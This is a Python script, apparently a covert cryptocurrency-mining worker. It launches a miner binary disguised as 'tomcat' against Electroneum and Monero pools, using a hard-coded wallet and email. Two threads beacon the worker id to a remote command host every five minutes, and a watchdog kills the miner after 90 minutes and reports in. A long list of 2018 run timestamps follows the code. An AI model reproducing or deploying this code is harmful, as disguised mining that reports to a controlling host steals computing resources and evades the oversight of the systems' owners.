import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:36:03.763173
#2018-02-17 16:21:05.079456
#2018-02-17 18:09:04.308453
#2018-02-17 19:57:04.240624
#2018-02-17 21:44:06.264631
#2018-02-17 23:28:01.480694
#2018-02-18 01:18:02.308059
#2018-02-18 03:05:06.893239
#2018-02-18 04:54:07.280407
#2018-02-18 06:47:05.074314
#2018-02-18 08:37:01.385792
#2018-02-18 10:23:04.785335
#2018-02-18 12:09:05.965964
#2018-02-18 13:54:06.675451
#2018-02-18 15:45:02.860459
#2018-02-18 17:34:04.632846
#2018-02-18 19:22:03.680846
#2018-02-18 21:07:07.198744
#2018-02-18 22:54:03.819933
#2018-02-19 00:41:04.095442
#2018-02-19 02:27:05.341548
#2018-02-19 04:14:04.568736
#2018-02-19 05:58:01.781287
#2018-02-19 07:46:04.437210
#2018-02-19 09:36:08.621403
#2018-02-19 11:25:04.534468
#2018-02-19 13:12:01.225192
#2018-02-19 15:01:01.768294
#2018-02-19 16:49:01.660102
#2018-02-19 18:35:09.034916
#2018-02-19 20:22:04.555233
#2018-02-19 22:10:05.852914
#2018-02-19 23:55:06.768643
#2018-02-20 01:42:01.756859
#2018-02-20 03:30:08.406014
#2018-02-20 05:17:05.592482
#2018-02-20 07:01:04.337965
#2018-02-20 08:46:07.798921
#2018-02-20 10:30:11.838136
#2018-02-20 12:16:07.075948
#2018-02-20 14:03:06.317284
#2018-02-20 15:46:01.448679
#2018-02-20 17:32:09.730719
#2018-02-20 19:19:08.446415
#2018-02-20 21:09:06.305787
#2018-02-20 22:54:01.955669
#2018-02-21 00:38:05.983032
#2018-02-21 02:25:01.409711
#2018-02-21 04:11:04.326781
#2018-02-21 05:58:06.748600
#2018-02-21 07:47:04.359513
#2018-02-21 09:33:05.800946
#2018-02-21 11:21:04.535235
#2018-02-21 13:11:04.722407
#2018-02-21 14:57:06.138786
#2018-02-21 16:47:06.253472
#2018-02-21 18:36:07.176646
#2018-02-21 20:21:07.032786
#2018-02-21 22:09:07.954350
#2018-02-21 23:58:05.238547
#2018-02-22 01:48:03.780317
#2018-02-22 03:34:06.879312
#2018-02-22 05:20:09.080982
#2018-02-22 07:06:07.823076
#2018-02-22 08:54:05.807657
#2018-02-22 10:42:06.086336
#2018-02-22 12:28:08.973459
#2018-02-22 14:14:01.486745
#2018-02-22 16:02:08.739393
#2018-02-22 17:48:09.047312
#2018-02-22 19:36:08.285804
#2018-02-22 21:29:07.674826
#2018-02-22 23:15:10.888632
#2018-02-23 01:02:08.522936
#2018-02-23 02:51:03.548660
#2018-02-23 04:39:05.114717
#2018-02-23 06:25:06.248153
#2018-02-23 08:11:08.442616
#2018-02-23 10:29:05.391349
#2018-02-23 12:22:05.396437
#2018-02-23 14:11:08.128208
#2018-02-23 16:01:09.209257
#2018-02-23 17:46:10.558311
#2018-02-23 19:32:08.377890
#2018-02-23 21:15:07.041943
#2018-02-23 23:03:08.278467
#2018-02-24 00:50:09.257065
#2018-02-24 02:40:09.850279
#2018-02-24 04:36:06.135966
#2018-02-24 06:21:04.008272
#2018-02-24 08:09:07.163313
#2018-02-24 09:54:07.708037
#2018-02-24 11:49:06.293967
#2018-02-24 13:41:07.354185
#2018-02-24 15:28:07.204256
#2018-02-24 17:18:04.896036
#2018-02-24 19:09:05.189671
#2018-02-24 20:57:03.813508
#2018-02-24 23:24:04.829460
#2018-02-25 02:48:06.185694
#2018-02-25 06:27:05.995651